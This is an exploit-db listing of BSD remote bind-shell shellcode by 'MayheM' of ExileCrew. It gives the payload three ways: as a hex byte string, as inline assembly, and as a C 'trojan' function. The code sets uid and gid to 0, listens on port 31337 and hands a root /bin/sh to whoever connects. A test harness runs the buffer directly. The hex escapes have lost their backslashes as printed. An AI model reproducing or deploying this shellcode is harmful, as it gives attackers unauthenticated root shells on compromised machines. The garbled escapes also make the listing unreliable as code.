https://www.exploit-db.com/exploits/13249

漏洞细节尚未披露

/*
Here is a BSD remote shellcode. 
Tested on NetBSD . SHould work on FreeBSD and OpenBSD .

by MayheM
ExileCrew (www.exile2k.org)
*/

/*
** 143 bytes
*/
char shellcode[] = 
"x31xC0"
"x50"
"x50"
"xB0x17"
"xCDx80"      // setuid
"x31xC0"
"x50"
"x50"
"xB0xB5"
"xCDx80"      // setgid
"xEBx60"
"x5E"
"x31xC0"
"x89x46x04"
"x88x46x17"
"x6Ax06"
"x6Ax01"
"x6Ax02"
"xb0x61"
"x50"
"xCDx80"      // socket
"x89xc7"
"x31xc0"
"x6ax10"
"x56"
"x57"
"xb0x68"
"x50"
"xCDx80"      // bind
"x6Ax01"
"x57"
"xb0x6A"
"x50"
"xCDx80"      // listen
"x50"
"x50"
"x57"
"xB0x1E"
"x50"
"xCDx80"      //accept
"x89xc7"
"x31xDB"
"x31xc9"
"xb1x03"
"x49"
"x31xc0"
"xb0x5A"
"x51"
"x57"
"x50"
"xcdx80"      // dup2
"x39xd9"
"x75xf2"
"x31xc0"
"x89x76x18"
"x89x46x1c"
"x8Dx56x1c"
"x8Dx4Ex18"
"x83xc6x10"
"x52"
"x51"
"x56"
"xb0x3b"
"x50"
"xcdx80"      // execve
"xe8x9bxffxffxff"
"xc0x02x7ax69x90x90x90x90xc0xd5xbfxefxb8xd5xbfxef"
"/bin/sh";






/*
** ASM shellcode
*/
fct()
{
  __asm__("


xorl  %eax, %eax
pushl %eax
pushl %eax
movb  $0x17, %al
int   $0x80 

xorl  %eax, %eax
pushl %eax
pushl %eax
movb  $0xB5, %al
int   $0x80 



jmp  data
code:
popl  %esi
xorl  %eax, %eax
movl  %eax, 0x04(%esi)
movb  %al , 0x17(%esi)

pushl $0x06
pushl $0x01
pushl $0x02
movb  $0x61, %al
pushl %eax
int   $0x80

movl  %eax, %edi
xorl  %eax, %eax
pushl $0x10
pushl %esi
pushl %edi
movb  $0x68, %al
pushl %eax
int   $0x80

pushl $0x01
pushl %edi
movb  $0x6A, %al
pushl %eax
int   $0x80

pushl %eax
pushl %eax
pushl %edi
movb  $0x1E, %al
pushl %eax
int   $0x80

movl  %eax, %edi
xorl  %ebx, %ebx
xorl  %ecx, %ecx
movb  $0x03, %ecx
loop:
decl  %ecx
xorl  %eax, %eax
movb  $0x5A, %al
pushl %ecx
pushl %edi
pushl %eax
int   $0x80
cmpl  %ebx, %ecx
jne   loop

xorl  %eax, %eax
movl  %esi, 0x18(%esi) 
movl  %eax, 0x1C(%esi)
leal  0x1C(%esi), %edx
leal  0x18(%esi), %ecx
addl  $0x10, %esi
pushl %edx
pushl %ecx
pushl %esi
movb  $0x3B, %al
pushl %eax
int   $0x80

data:
call  code
.string "xC0x02x7Ax69x90x90x90x90xC0xD5xBFxEFxB8xD5xBFxEF"
.string "/bin/shx90"
");
}




/*
** Test
*/
main()
{
  void  (*fct)();
  
  printf("shellcode lenght = %d bytes n", sizeof(shellcode));
  fct = (void *) shellcode;
  fct();
}





/*
** C shellcode
*/
trojan()
{
  int                   clientsock;
  int                   serversock;
  char                  *server;
  char                  *args[2];
  
  server = "xC0x02x7Ax69x00x00x00x00xC0xD5xBFxEFxB8xD5xBFxEF";
  args[0] = "/bin/sh";
  args[1] = 0x00;
  setuid(0);
  setgid(0);
  serversock = socket(0x02, 0x01, 0x06);
  bind(serversock, server, 0x10);
  listen(serversock, 0x01);
  clientsock = accept(serversock, 0x00, 0x00);
  dup2(clientsock, 0x02);
  dup2(clientsock, 0x01);
  dup2(clientsock, 0x00);
  execve(args[0], args, args[1]);
}

// milw0rm.com [2004-09-26]